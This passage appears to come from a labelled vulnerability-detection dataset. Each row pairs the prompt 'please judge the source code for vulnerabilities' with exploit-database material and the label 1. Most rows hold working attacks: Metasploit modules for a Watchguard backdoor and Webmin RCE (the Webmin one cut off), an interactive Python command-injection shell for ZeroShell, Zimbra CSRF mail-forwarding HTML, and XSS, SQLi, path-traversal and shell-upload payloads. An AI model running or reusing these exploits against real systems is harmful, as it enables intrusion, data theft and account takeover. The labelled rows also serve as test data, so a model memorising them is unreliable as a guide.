and create a link which will fetch that key<NEWLINE>3. Make the victim call that link<NEWLINE>Solution:<NEWLINE>Users should not click links from untrusted sources. We now sanitize the returned key and make sure HTML content does not get interpreted by the browser. Operators should update to the latest Patch Release.<NEWLINE>Internal reference: 48080 (Bug ID)<NEWLINE>Vulnerability type: Cross Site Scripting (CWE<hyphen>80)<NEWLINE>Vulnerable version: 2.4.2 and earlier<NEWLINE>Vulnerable component: guard<NEWLINE>Report confidence: Confirmed<NEWLINE>Solution status: Fixed by Vendor<NEWLINE>Fixed version: 2.4.0<hyphen>rev11, 2.4.2<hyphen>rev5<NEWLINE>Researcher credits: Benjamin Daniel Mussler (@dejavuln)<NEWLINE>Vendor notification: 2016<hyphen>08<hyphen>15<NEWLINE>Solution date: 2016<hyphen>08<hyphen>18<NEWLINE>Public disclosure: 2016<hyphen>09<hyphen>13<NEWLINE>CVE reference: CVE<hyphen>2016<hyphen>6851<NEWLINE>CVSS: 4.3 (CVSS:3.0<slash>AV:N<slash>AC:L<slash>PR:N<slash>UI:R<slash>S:U<slash>C:L<slash>I:N<slash>A:N)<NEWLINE>Vulnerability Details:<NEWLINE>Script code can be provided as parameter to the OX Guard guest reader web application. This allows cross<hyphen>site scripting attacks against arbitrary users since no prior authentication is needed.<NEWLINE>Risk:<NEWLINE>Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.) in case the user has a active session on the same domain already.<NEWLINE>Steps to reproduce:<NEWLINE>1. As attacker, create a hyperlink with script code included at the <double<underscore>quote>templid<double<underscore>quote> parameter<NEWLINE>2. Make the victim open that link<NEWLINE>Solution:<NEWLINE>Users should not click links from untrusted sources. We now sanitize the returned content for this parameter. Operators should update to the latest Patch Release. | 1 |
please judge the source code for vulnerabilities. | class MetasploitModule < Msf::Exploit::Remote<NEWLINE>Rank = ExcellentRanking<NEWLINE>include Msf::Exploit::Remote::HttpClient<NEWLINE>include Msf::Exploit::FileDropper<NEWLINE>def initialize(info={})<NEWLINE>super(update<underscore>info(info,<NEWLINE><single<underscore>quote>Name<single<underscore>quote> => <single<underscore>quote>Watchguard AP Backdoor Shell<single<underscore>quote>,<NEWLINE><single<underscore>quote>Description<single<underscore>quote> => <single<underscore>quote>Watchguard AP<backslash><single<underscore>quote>s have a backdoor account with known credentials. This can be used to<NEWLINE>gain a valid web session on the HTTP administration interface. The administrator<NEWLINE>can then upload a shell directly to the web root to execute it.<NEWLINE>This module can also be used if you have legitimate access credentials to the device.<single<underscore>quote>,<NEWLINE><single<underscore>quote>References<single<underscore>quote> =><NEWLINE>[<NEWLINE>[<single<underscore>quote>CVE<single<underscore>quote>, <single<underscore>quote>CVE<hyphen>2018<hyphen>10575<single<underscore>quote>],<NEWLINE>[<single<underscore>quote>CVE<single<underscore>quote>, <single<underscore>quote>CVE<hyphen>2018<hyphen>10576<single<underscore>quote>],<NEWLINE>[<single<underscore>quote>CVE<single<underscore>quote>, <single<underscore>quote>CVE<hyphen>2018<hyphen>10577<single<underscore>quote>],<NEWLINE>[<single<underscore>quote>URL<single<underscore>quote>, <single<underscore>quote>http:<slash><slash>seclists.org<slash>fulldisclosure<slash>2018<slash>May<slash>12<single<underscore>quote>],<NEWLINE>[<single<underscore>quote>URL<single<underscore>quote>, <single<underscore>quote>https:<slash><slash>watchguardsupport.secure.force.com<slash>publicKB?type=KBSecurityIssues&SFDCID=kA62A0000000LIy<single<underscore>quote>],<NEWLINE>],<NEWLINE><single<underscore>quote>Author<single<underscore>quote> => <single<underscore>quote>Stephen Shkardoon <single<underscore>quote>,<NEWLINE><single<underscore>quote>License<single<underscore>quote> => MSF<underscore>LICENSE,<NEWLINE><single<underscore>quote>Platform<single<underscore>quote> => <single<underscore>quote>linux<single<underscore>quote>,<NEWLINE><single<underscore>quote>Targets<single<underscore>quote> => [ [ <single<underscore>quote>Automatic<single<underscore>quote>, { } ] ],<NEWLINE><single<underscore>quote>DefaultTarget<single<underscore>quote> => 0,<NEWLINE><single<underscore>quote>Arch<single<underscore>quote> => ARCH<underscore>MIPSBE,<NEWLINE>))<NEWLINE>register<underscore>options(<NEWLINE>[<NEWLINE>Opt::RPORT(443),<NEWLINE>OptString.new(<single<underscore>quote>WG<underscore>USER<single<underscore>quote>, [ true, <single<underscore>quote>The username to authenticate as<single<underscore>quote>, <single<underscore>quote>admin<single<underscore>quote>]),<NEWLINE>OptString.new(<single<underscore>quote>WG<underscore>PASS<single<underscore>quote>, [ true, <single<underscore>quote>The password for the specified username<single<underscore>quote>, <single<underscore>quote>1234<single<underscore>quote>]),<NEWLINE>])<NEWLINE>end<NEWLINE>def exploit<NEWLINE>begin<NEWLINE>res = send<underscore>request<underscore>cgi({<NEWLINE><single<underscore>quote>method<single<underscore>quote> => <single<underscore>quote>GET<single<underscore>quote>,<NEWLINE><single<underscore>quote>uri<single<underscore>quote> => <single<underscore>quote><slash>cgi<hyphen>bin<slash>luci<slash><single<underscore>quote>,<NEWLINE><single<underscore>quote>headers<single<underscore>quote> => {<NEWLINE><single<underscore>quote>AUTH<underscore>USER<single<underscore>quote> => datastore[<single<underscore>quote>WG<underscore>USER<single<underscore>quote>],<NEWLINE><single<underscore>quote>AUTH<underscore>PASS<single<underscore>quote> => datastore[<single<underscore>quote>WG<underscore>PASS<single<underscore>quote>],<NEWLINE>},<NEWLINE>})<NEWLINE>if res.nil? || res.get<underscore>cookies.empty?<NEWLINE>fail<underscore>with(Failure::NotFound, <single<underscore>quote>Unable to obtain a valid session with provided credentials<single<underscore>quote>)<NEWLINE>end<NEWLINE>sysauth = res.get<underscore>cookies.scan(<slash>(sysauth=<backslash>w+);*<slash>).flatten[0]<NEWLINE>stok = res.redirection.to<underscore>s.scan(<slash>;(stok=<backslash>w+)<slash>).flatten[0]<NEWLINE>vprint<underscore>status(<double<underscore>quote>Got sysauth<NEWLINE>vprint<underscore>status(<double<underscore>quote>Got stok<NEWLINE>res = send<underscore>request<underscore>cgi({<NEWLINE><single<underscore>quote>method<single<underscore>quote> => <single<underscore>quote>GET<single<underscore>quote>,<NEWLINE><single<underscore>quote>uri<single<underscore>quote> => <double<underscore>quote><slash>cgi<hyphen>bin<slash>luci<slash>;<NEWLINE><single<underscore>quote>headers<single<underscore>quote> => {<NEWLINE><single<underscore>quote>AUTH<underscore>USER<single<underscore>quote> => datastore[<single<underscore>quote>WG<underscore>USER<single<underscore>quote>],<NEWLINE><single<underscore>quote>AUTH<underscore>PASS<single<underscore>quote> => datastore[<single<underscore>quote>WG<underscore>PASS<single<underscore>quote>],<NEWLINE>},<NEWLINE><single<underscore>quote>cookie<single<underscore>quote> => sysauth,<NEWLINE>})<NEWLINE>if res.nil? || res.code != 200<NEWLINE>fail<underscore>with(Failure::NotFound, <single<underscore>quote>Unable to request serial<single<underscore>quote>)<NEWLINE>end<NEWLINE>if res.body.match(<slash>device<underscore>serial = <double<underscore>quote>(<backslash>w+)<double<underscore>quote>;<slash>)<NEWLINE>serial = $1<NEWLINE>else<NEWLINE>fail<underscore>with(Failure::NotFound, <single<underscore>quote>Unable to find serial in response<single<underscore>quote>)<NEWLINE>end<NEWLINE>vprint<underscore>status(<double<underscore>quote>Got serial<NEWLINE>res = send<underscore>request<underscore>cgi({<NEWLINE><single<underscore>quote>method<single<underscore>quote> => <single<underscore>quote>POST<single<underscore>quote>,<NEWLINE><single<underscore>quote>uri<single<underscore>quote> => <double<underscore>quote><slash>cgi<hyphen>bin<slash>luci<slash>;<NEWLINE><single<underscore>quote>headers<single<underscore>quote> => {<NEWLINE><single<underscore>quote>AUTH<underscore>USER<single<underscore>quote> => datastore[<single<underscore>quote>WG<underscore>USER<single<underscore>quote>],<NEWLINE><single<underscore>quote>AUTH<underscore>PASS<single<underscore>quote> => datastore[<single<underscore>quote>WG<underscore>PASS<single<underscore>quote>],<NEWLINE>},<NEWLINE><single<underscore>quote>cookie<single<underscore>quote> => <double<underscore>quote><NEWLINE><single<underscore>quote>data<single<underscore>quote> => payload.encoded<underscore>exe,<NEWLINE>})<NEWLINE>if res.nil? || res.code != 205<NEWLINE>fail<underscore>with(Failure::NotFound, <double<underscore>quote>Could not upload file 1:<NEWLINE>end<NEWLINE>res = send<underscore>request<underscore>cgi({<NEWLINE><single<underscore>quote>method<single<underscore>quote> => <single<underscore>quote>POST<single<underscore>quote>,<NEWLINE><single<underscore>quote>uri<single<underscore>quote> => <double<underscore>quote><slash>cgi<hyphen>bin<slash>luci<slash>;<NEWLINE><single<underscore>quote>headers<single<underscore>quote> => {<NEWLINE><single<underscore>quote>AUTH<underscore>USER<single<underscore>quote> => datastore[<single<underscore>quote>WG<underscore>USER<single<underscore>quote>],<NEWLINE><single<underscore>quote>AUTH<underscore>PASS<single<underscore>quote> => datastore[<single<underscore>quote>WG<underscore>PASS<single<underscore>quote>],<NEWLINE>},<NEWLINE><single<underscore>quote>cookie<single<underscore>quote> => <double<underscore>quote><NEWLINE><single<underscore>quote>data<single<underscore>quote> => <double<underscore>quote><NEWLINE>os.execute(<single<underscore>quote><slash>bin<slash>chmod +x <slash>tmp<slash>payload<single<underscore>quote>);<NEWLINE>os.execute(<single<underscore>quote><slash>tmp<slash>payload<single<underscore>quote>);<double<underscore>quote><NEWLINE>})<NEWLINE>if res.nil? || res.code != 205<NEWLINE>fail<underscore>with(Failure::NotFound, <double<underscore>quote>Could not upload file 1:<NEWLINE>end<NEWLINE>register<underscore>file<underscore>for<underscore>cleanup(<double<underscore>quote><slash>www<slash>cgi<hyphen>bin<slash>payload.luci<double<underscore>quote>)<NEWLINE>vprint<underscore>status(<double<underscore>quote>Uploaded lua script<double<underscore>quote>)<NEWLINE>res = send<underscore>request<underscore>cgi({<NEWLINE><single<underscore>quote>method<single<underscore>quote> => <single<underscore>quote>GET<single<underscore>quote>,<NEWLINE><single<underscore>quote>uri<single<underscore>quote> => <double<underscore>quote><slash>cgi<hyphen>bin<slash>payload.luci<double<underscore>quote>,<NEWLINE>})<NEWLINE>vprint<underscore>status(<double<underscore>quote>Requested lua payload<double<underscore>quote>)<NEWLINE>rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout<NEWLINE>vprint<underscore>error(<double<underscore>quote>Failed to connect to the web server<double<underscore>quote>)<NEWLINE>return nil<NEWLINE>end<NEWLINE>end<NEWLINE>end | 1 |
please judge the source code for vulnerabilities. | ======================================<NEWLINE>Multiple CSRF in Zimbra Mail interface<NEWLINE>======================================<NEWLINE>CVE<hyphen>2015<hyphen>6541<NEWLINE>Description<NEWLINE>===========<NEWLINE>Multiple CSRF vulnerabilities have been found in the Mail interface of<NEWLINE>Zimbra 8.0.9 GA Release, enabling to change account<NEWLINE>preferences like e<hyphen>mail forwarding.<NEWLINE>CSRF<NEWLINE>====<NEWLINE>Forms in the preferences part of old releases of Zimbra are vulnerable<NEWLINE>to CSRF because of the lack of a CSRF token identifying a valid session.<NEWLINE>As a consequence, requests can be forged and played arbitrarily.<NEWLINE>**Access Vector**: remote<NEWLINE>**Security Risk**: low<NEWLINE>**Vulnerability**: CWE<hyphen>352<NEWLINE>**CVSS Base score**: 5.8<NEWLINE><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>Proof of Concept<NEWLINE><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE><html><NEWLINE><body><NEWLINE><form enctype=<double<underscore>quote>text<slash>plain<double<underscore>quote> id=<double<underscore>quote>trololo<double<underscore>quote><NEWLINE>action=<double<underscore>quote>https:<slash><slash>192.168.0.171<slash>service<slash>soap<slash>BatchRequest<double<underscore>quote> method=<double<underscore>quote>POST<double<underscore>quote>><NEWLINE><input name=<single<underscore>quote><soap:Envelope<NEWLINE>xmlns:soap=<double<underscore>quote>http:<slash><slash>www.w3.org<slash>2003<slash>05<slash>soap<hyphen>envelope<double<underscore>quote>><soap:Header><context<NEWLINE>xmlns=<double<underscore>quote>urn:zimbra<double<underscore>quote>><userAgent xmlns=<double<underscore>quote><double<underscore>quote> name=<double<underscore>quote>ZimbraWebClient <hyphen> FF38<NEWLINE>(Win)<double<underscore>quote> version=<double<underscore>quote>8.0.9<underscore>GA<underscore>6191<double<underscore>quote><slash>><session xmlns=<double<underscore>quote><double<underscore>quote> id=<double<underscore>quote>19<double<underscore>quote><slash>><account<NEWLINE>xmlns=<double<underscore>quote><double<underscore>quote> by=<double<underscore>quote>name<double<underscore>quote>>anto@mail.ubuntu.fr<<slash>account><format xmlns=<double<underscore>quote><double<underscore>quote><NEWLINE>type=<double<underscore>quote>js<double<underscore>quote><slash>><<slash>context><<slash>soap:Header><soap:Body><BatchRequest<NEWLINE>xmlns=<double<underscore>quote>urn:zimbra<double<underscore>quote> onerror=<double<underscore>quote>stop<double<underscore>quote>><ModifyPrefsRequest<NEWLINE>xmlns=<double<underscore>quote>urn:zimbraAccount<double<underscore>quote> requestId=<double<underscore>quote>0<double<underscore>quote>><pref xmlns=<double<underscore>quote><double<underscore>quote><NEWLINE>name=<double<underscore>quote>zimbraPrefMailForwardingAddress<double<underscore>quote>>itworks@ubuntu.fr<<slash>pref><<slash>ModifyPrefsRequest><a<NEWLINE>xmlns=<double<underscore>quote><double<underscore>quote> n<single<underscore>quote><NEWLINE>value=<single<underscore>quote><double<underscore>quote>sn<double<underscore>quote>>itworks<<slash>a><<slash>BatchRequest><<slash>soap:Body><<slash>soap:Envelope><single<underscore>quote><slash>><NEWLINE><<slash>form><NEWLINE><script><NEWLINE>document.forms[0].submit();<NEWLINE><<slash>script><NEWLINE><<slash>body><NEWLINE><<slash>html><NEWLINE>Solution<NEWLINE>========<NEWLINE>Sensitive forms should be protected by a CSRF token.<NEWLINE>Fixes<NEWLINE>=====<NEWLINE>Fixed with 8.5 release : bug 83547<NEWLINE>(https:<slash><slash>wiki.zimbra.com<slash>wiki<slash>Security<slash>Collab<slash>86<NEWLINE>Affected versions<NEWLINE>=================<NEWLINE>* Zimbra <= 8.0.9 GA Release<NEWLINE>Credits<NEWLINE>=======<NEWLINE>* Anthony LAOU<hyphen>HINE TSUEI, Sysdream (laouhine<underscore>anthony <hyphen>at<hyphen> hotmail<NEWLINE><hyphen>dot<hyphen> fr)<NEWLINE>* Damien CAUQUIL, Sysdream (d.cauquil <hyphen>at<hyphen> sysdream <hyphen>dot<hyphen> com) | 1 |
please judge the source code for vulnerabilities. | When the user wants to add a new server on the <double<underscore>quote>Server<double<underscore>quote> panel, in <double<underscore>quote>name<double<underscore>quote><NEWLINE>parameter has not had any filtration.<NEWLINE>POST <slash>api<slash>servers HTTP<slash>1.1<NEWLINE>Host: IP<NEWLINE>Content<hyphen>Length: 102<NEWLINE>Accept: application<slash>json<NEWLINE>X<hyphen>Requested<hyphen>With: XMLHttpRequest<NEWLINE>Authorization: Bearer<NEWLINE>User<hyphen>Agent: Mozilla<slash>5.0 (Windows NT 10.0; Win64; x64) AppleWebKit<slash>537.36<NEWLINE>(KHTML, like Gecko) Chrome<slash>98.0.4758.82 Safari<slash>537.36<NEWLINE>Content<hyphen>Type: application<slash>json<NEWLINE>Origin: http:<slash><slash>IP<NEWLINE>Referer: http:<slash><slash>IP<slash>servers<NEWLINE>Accept<hyphen>Encoding: gzip, deflate<NEWLINE>Accept<hyphen>Language: en<hyphen>US,en;q=0.9<NEWLINE>Connection: close<NEWLINE>{<NEWLINE><double<underscore>quote>name<double<underscore>quote>:<double<underscore>quote><backslash><double<underscore>quote>><script>alert(1337)<<slash>script><double<underscore>quote>,<NEWLINE><double<underscore>quote>ip<double<underscore>quote>:<double<underscore>quote>10.10.10.10<double<underscore>quote>,<NEWLINE><double<underscore>quote>provider<double<underscore>quote>:<double<underscore>quote>local<double<underscore>quote>,<NEWLINE><double<underscore>quote>location<double<underscore>quote>:<double<underscore>quote>xss test<double<underscore>quote><NEWLINE>} | 1 |
please judge the source code for vulnerabilities. | <slash>theme<slash>default<slash>img<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash>%2e%2e<slash><slash>etc<slash>passwd<single<underscore>quote> | 1 |
please judge the source code for vulnerabilities. | Introduction<NEWLINE>Zeroshell is a small Linux distribution for servers and embedded devices with the aim to provide network services. It is available in the form of live CD or compact Flash image and it can be configured using a web browser. The main features of Zeroshell include: load balancing and failover of multiple Internet connections, UMTS<slash>HSDPA connections by using 3G modems, RADIUS server for providing secure authentication and automatic management of encryption keys to wireless networks, captive portal to support web login, and many others.<NEWLINE>Vulnerabilities: Unauthenticated Remote Code Execution | RCE<NEWLINE>RCE details:<NEWLINE>RCE 1<NEWLINE>URL<NEWLINE>http:<slash><slash>192.168.0.75<slash>cgi<hyphen>bin<slash>kerbynet?Action=StartSessionSubmit&User=%27%26cat%20<slash>etc<slash>passwd%26%27&PW=<NEWLINE>METHOD<NEWLINE>Get,Post<NEWLINE>PARAMETER<NEWLINE>User<NEWLINE>PAYLOAD<NEWLINE>%27%26cat%20<slash>etc<slash>passwd%26%27<NEWLINE>RCE 2<NEWLINE>URL<NEWLINE>http:<slash><slash>192.168.0.75<slash>cgi<hyphen>bin<slash>kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%26cat%20<slash>etc<slash>passwd%26%27<NEWLINE>METHOD<NEWLINE>Get<NEWLINE>PARAMETER<NEWLINE>x509type<NEWLINE>PAYLOAD<NEWLINE>%27%26cat%20<slash>etc<slash>passwd%26%27<NEWLINE>RCE 3<NEWLINE>URL<NEWLINE>http:<slash><slash>192.168.0.75<slash>cgi<hyphen>bin<slash>kerbynet?Section=NoAuthREQ&Action=x509List&type=%22%26cat%20<slash>etc<slash>passwd%26%22<NEWLINE>METHOD<NEWLINE>Get<NEWLINE>PARAMETER<NEWLINE>type<NEWLINE>PAYLOAD<NEWLINE>%22%26cat%20<slash>etc<slash>passwd%26%22 | 1 |
please judge the source code for vulnerabilities. | <hyphen><hyphen><hyphen><hyphen><hyphen> PoC: SQLi <hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>Request: http:<slash><slash>localhost<slash>[PATH]<slash>ara.html?ara=<NEWLINE>Vulnerable Parameter: ara (GET)<NEWLINE>Payload: 0<single<underscore>quote>XOR(if(now()=sysdate(),sleep(0),0))XOR<single<underscore>quote>Z | 1 |
please judge the source code for vulnerabilities. | PHP Forum ohne My SQL Remote File Upload Vulnerability<NEWLINE>The exploit :<NEWLINE>http:<slash><slash>localhost<slash>path<slash>upload.php<NEWLINE>change shell<NEWLINE>shell.php.hphp.jpeg<NEWLINE>Get now shell :<NEWLINE>http:<slash><slash>localhost<slash>path<slash>imguploads<slash>shell.php.hphp.jpeg<NEWLINE>and good luck :D<NEWLINE>Thanks to : shooq hacker .. | 1 |
please judge the source code for vulnerabilities. | <hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>Vulnerable URL: http:<slash><slash><Siebel<underscore>Application><slash>finsadm<underscore>enu<slash>start.swe?SWECmd=GotoView&SWEView=Activity+Attachment+View<NEWLINE>2017<hyphen>December<hyphen>23: Discovered vulnerability<NEWLINE>2017<hyphen>December<hyphen>25: Vendor Notification<NEWLINE>2017<hyphen>December<hyphen>27: Vendor Response<slash>Feedback<NEWLINE>2019<hyphen>July<hyphen>16: Vendor Fix<slash>Patch<NEWLINE>2019<hyphen>July<hyphen>17: Public Disclosure<NEWLINE>Warm regards,<NEWLINE>Sarath Nair | 1 |
please judge the source code for vulnerabilities. | POST <slash>dashboard<slash>withdrawal HTTP<slash>1.1<NEWLINE>Host: 127.0.0.1:8080<NEWLINE>Accept<hyphen>Encoding: gzip, deflate<NEWLINE>Accept: *<slash>*<NEWLINE>Accept<hyphen>Language: en<NEWLINE>User<hyphen>Agent: Mozilla<slash>5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;<NEWLINE>Trident<slash>5.0)<NEWLINE>Connection: close<NEWLINE>Referer: http:<slash><slash>127.0.0.1:8080<slash>dashboard<slash>withdrawals<NEWLINE>Content<hyphen>Type: application<slash>x<hyphen>www<hyphen>form<hyphen>urlencoded<NEWLINE>Content<hyphen>Length: 112<NEWLINE>Cookie:<NEWLINE>XSRF<hyphen>TOKEN=eyJpdiI6IlAwSjE2SjE1REVUdTM0bXhsMDY1b3c9PSIsInZhbHVlIjoiN204<NEWLINE>d3RFcmdOSFVmTEo2cGh5bFlxY3RlR0p2U2hoN3NkNDZ5Vit3MjdpS3B2RHJG<NEWLINE>aVFZdzlKNmFyN25RbWJLRnZtT3FaTDVvbHV4Ym9HMmFiWlhGY0E9PSIsIm1h<NEWLINE>YyI6ImZmNTFhOGJkMmYxMTBlMGRjZDU4YzQ5MTI3NTljN2JiOGYyODc3MTEx<NEWLINE>YjhjMzFiZTNkNWMzZjc5YjVlYTUyODEifQ%3D%3D;<NEWLINE>laravel<underscore>session=eyJpdiI6IjZycklXVDNRTWsrT0NsZ3A2ZnIrWFE9PSIsInZhbHVlIjoiRzdC<NEWLINE>VlJzXC81VWdSWHlkSys2K3dtR2h3UnpzZzhjT1wvdDZtZ3BOMXpjU09SMTJD<NEWLINE>TGdXeEhSWkhadGt0RnhPRDR3MWZreXlLOTA1RDNIQStIZFpxRG5OZz09Iiwi<NEWLINE>bWFjIjoiNTkwYzU3ZGMxOTg3NWU1ZWFjNjVjNjNkN2VjODkzYTBjZDI3MTAx<NEWLINE>NWJmZTUzN2VhZDRlNzEyMDcyODk5ZmFlZiJ9;<NEWLINE><underscore><underscore>tawkuuid=e::trade.brynamics.xyz::3PC5vtdJoz40C7aJUDGFFuGkOrICf1<NEWLINE>3gr5+ReA6AWqfUvhPDsTAf982UcNP+u5nq::2;<NEWLINE>TawkConnectionTime=0<NEWLINE>amount=555<hyphen>555<hyphen>0199@example.com<NEWLINE>&payment<underscore>mode=Bitcoin&method<underscore>id=2&<underscore>token=<NEWLINE>VG4OwJ1Dxx0kDSA3JCp0JtHDMX3TI5WpXE6nTDWi<NEWLINE>HTTP<slash>1.1 500 Internal Server Error<NEWLINE>Date: Mon, 16 Jul 2018 11:14:58 GMT<NEWLINE>Server: Apache<NEWLINE>X<hyphen>Powered<hyphen>By: PHP<slash>7.0.30<NEWLINE>Cache<hyphen>Control: no<hyphen>cache, private<NEWLINE>Connection: close<NEWLINE>Content<hyphen>Type: text<slash>html; charset=UTF<hyphen>8<NEWLINE>Content<hyphen>Length: 708733<NEWLINE><!DOCTYPE html><!<hyphen><hyphen><NEWLINE>Illuminate<backslash>Database<backslash>QueryException: SQLSTATE[22001]: String data, right<NEWLINE>truncated: 1406 Data too long for column &<NEWLINE>1 (SQL:<NEWLINE>insert into `withdrawals` (`amount`, `to<underscore>deduct`, `payment<underscore>mode`, `status`,<NEWLINE>`user`, `updated<underscore>at`, `created<underscore>at`) values (555<hyphen>555<hyphen>0199@example.com,<NEWLINE>620.5, Bitcoin, Pending, 182, 2018<hyphen>07<hyphen>16 11:14:59, 2018<hyphen>07<hyphen>16 11:14:59)) in | 1 |
please judge the source code for vulnerabilities. | import requests<NEWLINE>import optparse<NEWLINE>import time<NEWLINE>parser = optparse.OptionParser()<NEWLINE>parser.add<underscore>option(<single<underscore>quote><hyphen>u<single<underscore>quote>, <single<underscore>quote><hyphen><hyphen>url<single<underscore>quote>, action=<double<underscore>quote>store<double<underscore>quote>, dest=<double<underscore>quote>url<double<underscore>quote>, help=<single<underscore>quote>Base target uri (ex. http:<slash><slash>target<hyphen>uri<slash>)<single<underscore>quote>)<NEWLINE>options, args = parser.parse<underscore>args()<NEWLINE>if not options.url:<NEWLINE>print(<single<underscore>quote>[+] Specify an url target<single<underscore>quote>)<NEWLINE>print(<single<underscore>quote>[+] Example usage: exploit.py <hyphen>u http:<slash><slash>target<hyphen>uri<slash><single<underscore>quote>)<NEWLINE>print(<single<underscore>quote>[+] Example help usage: exploit.py <hyphen>h<single<underscore>quote>)<NEWLINE>exit()<NEWLINE>uri<underscore>zeroshell = options.url<NEWLINE>session = requests.Session()<NEWLINE>def command():<NEWLINE>try:<NEWLINE>check = session.get(uri<underscore>zeroshell + <double<underscore>quote><slash>cgi<hyphen>bin<slash>kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=<single<underscore>quote>%0Aid%0A<single<underscore>quote><double<underscore>quote>)<NEWLINE>if check.status<underscore>code == 200:<NEWLINE>flag = True<NEWLINE>print(<single<underscore>quote>[+] ZeroShell 3.9.0 Remote Command Execution<single<underscore>quote>)<NEWLINE>time.sleep(1)<NEWLINE>print(<single<underscore>quote>[+] Success connect to target<single<underscore>quote>)<NEWLINE>time.sleep(1)<NEWLINE>print(<single<underscore>quote>[+] Trying to execute command in ZeroShell OS...<backslash>n<single<underscore>quote>)<NEWLINE>time.sleep(1)<NEWLINE>check.raise<underscore>for<underscore>status()<NEWLINE>while flag:<NEWLINE>cmd = raw<underscore>input(<double<underscore>quote>$ <double<underscore>quote>)<NEWLINE>payload = <double<underscore>quote><slash>cgi<hyphen>bin<slash>kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=<single<underscore>quote>%0A<double<underscore>quote> + cmd + <double<underscore>quote>%0A<single<underscore>quote><double<underscore>quote><NEWLINE>uri<underscore>vuln = uri<underscore>zeroshell + payload<NEWLINE>burp0<underscore>headers = {<double<underscore>quote>User<hyphen>Agent<double<underscore>quote>: <double<underscore>quote>Mozilla<slash>5.0 (X11; Linux x86<underscore>64; rv:78.0) Gecko<slash>20100101 Firefox<slash>78.0<double<underscore>quote>, <double<underscore>quote>Accept<double<underscore>quote>: <double<underscore>quote>text<slash>html,application<slash>xhtml+xml,application<slash>xml;q=0.9,image<slash>webp,*<slash>*;q=0.8<double<underscore>quote>, <double<underscore>quote>Accept<hyphen>Language<double<underscore>quote>: <double<underscore>quote>en<hyphen>US,en;q=0.5<double<underscore>quote>, <double<underscore>quote>Accept<hyphen>Encoding<double<underscore>quote>: <double<underscore>quote>gzip, deflate<double<underscore>quote>, <double<underscore>quote>Connection<double<underscore>quote>: <double<underscore>quote>close<double<underscore>quote>, <double<underscore>quote>Upgrade<hyphen>Insecure<hyphen>Requests<double<underscore>quote>: <double<underscore>quote>1<double<underscore>quote>}<NEWLINE>res = session.get(uri<underscore>vuln, headers=burp0<underscore>headers, verify=False)<NEWLINE>print(res.text[:res.text.rindex(<double<underscore>quote><html><double<underscore>quote>) <slash> 2])<NEWLINE>except requests.exceptions.ConnectionError as err:<NEWLINE>print(<single<underscore>quote>[x] Failed to Connect in: <single<underscore>quote>+uri<underscore>zeroshell+<single<underscore>quote> <single<underscore>quote>)<NEWLINE>print(<single<underscore>quote>[x] This host seems to be Down<single<underscore>quote>)<NEWLINE>exit()<NEWLINE>except requests.exceptions.HTTPError as conn:<NEWLINE>print(<single<underscore>quote>[x] Failed to execute command in: <single<underscore>quote>+uri<underscore>zeroshell+<single<underscore>quote> <single<underscore>quote>)<NEWLINE>print(<single<underscore>quote>[x] This host does not appear to be a ZeroShell<single<underscore>quote>)<NEWLINE>exit()<NEWLINE>command() | 1 |
please judge the source code for vulnerabilities. | class MetasploitModule < Msf::Exploit::Remote<NEWLINE>Rank = ExcellentRanking<NEWLINE>include Msf::Exploit::Remote::HttpClient<NEWLINE>def initialize(info={})<NEWLINE>super(update<underscore>info(info,<NEWLINE><single<underscore>quote>Name<single<underscore>quote> => <double<underscore>quote>Webmin < 1.930 Remote Code Execution<double<underscore>quote>,<NEWLINE><single<underscore>quote>Description<single<underscore>quote> => %q{<NEWLINE>This exploit takes advantage of a code execution issue within the function<NEWLINE>unserialise<underscore>variable() located in web<hyphen>lib<hyphen>funcs.pl, in order to gain root.<NEWLINE>The only prerequisite is a valid session id.<NEWLINE>},<NEWLINE><single<underscore>quote>License<single<underscore>quote> => MSF<underscore>LICENSE,<NEWLINE><single<underscore>quote>Author<single<underscore>quote> =><NEWLINE>[<NEWLINE><single<underscore>quote>James Bercegay<single<underscore>quote>,<NEWLINE>],<NEWLINE><single<underscore>quote>References<single<underscore>quote> =><NEWLINE>[<NEWLINE>[ <single<underscore>quote>URL<single<underscore>quote>, <single<underscore>quote>https:<slash><slash>www.gulftech.org<slash><single<underscore>quote> ]<NEWLINE>],<NEWLINE><single<underscore>quote>Privileged<single<underscore>quote> => false,<NEWLINE><single<underscore>quote>Payload<single<underscore>quote> =><NEWLINE>{<NEWLINE><single<underscore>quote>DisableNops<single<underscore>quote> => true<NEWLINE>},<NEWLINE><single<underscore>quote>Platform<single<underscore>quote> => [<single<underscore>quote>unix<single<underscore>quote>],<NEWLINE><single<underscore>quote>Arch<single<underscore>quote> => ARCH<underscore>CMD,<NEWLINE><single<underscore>quote>Targets<single<underscore>quote> => [ [<single<underscore>quote>Automatic<single<underscore>quote>, {}] 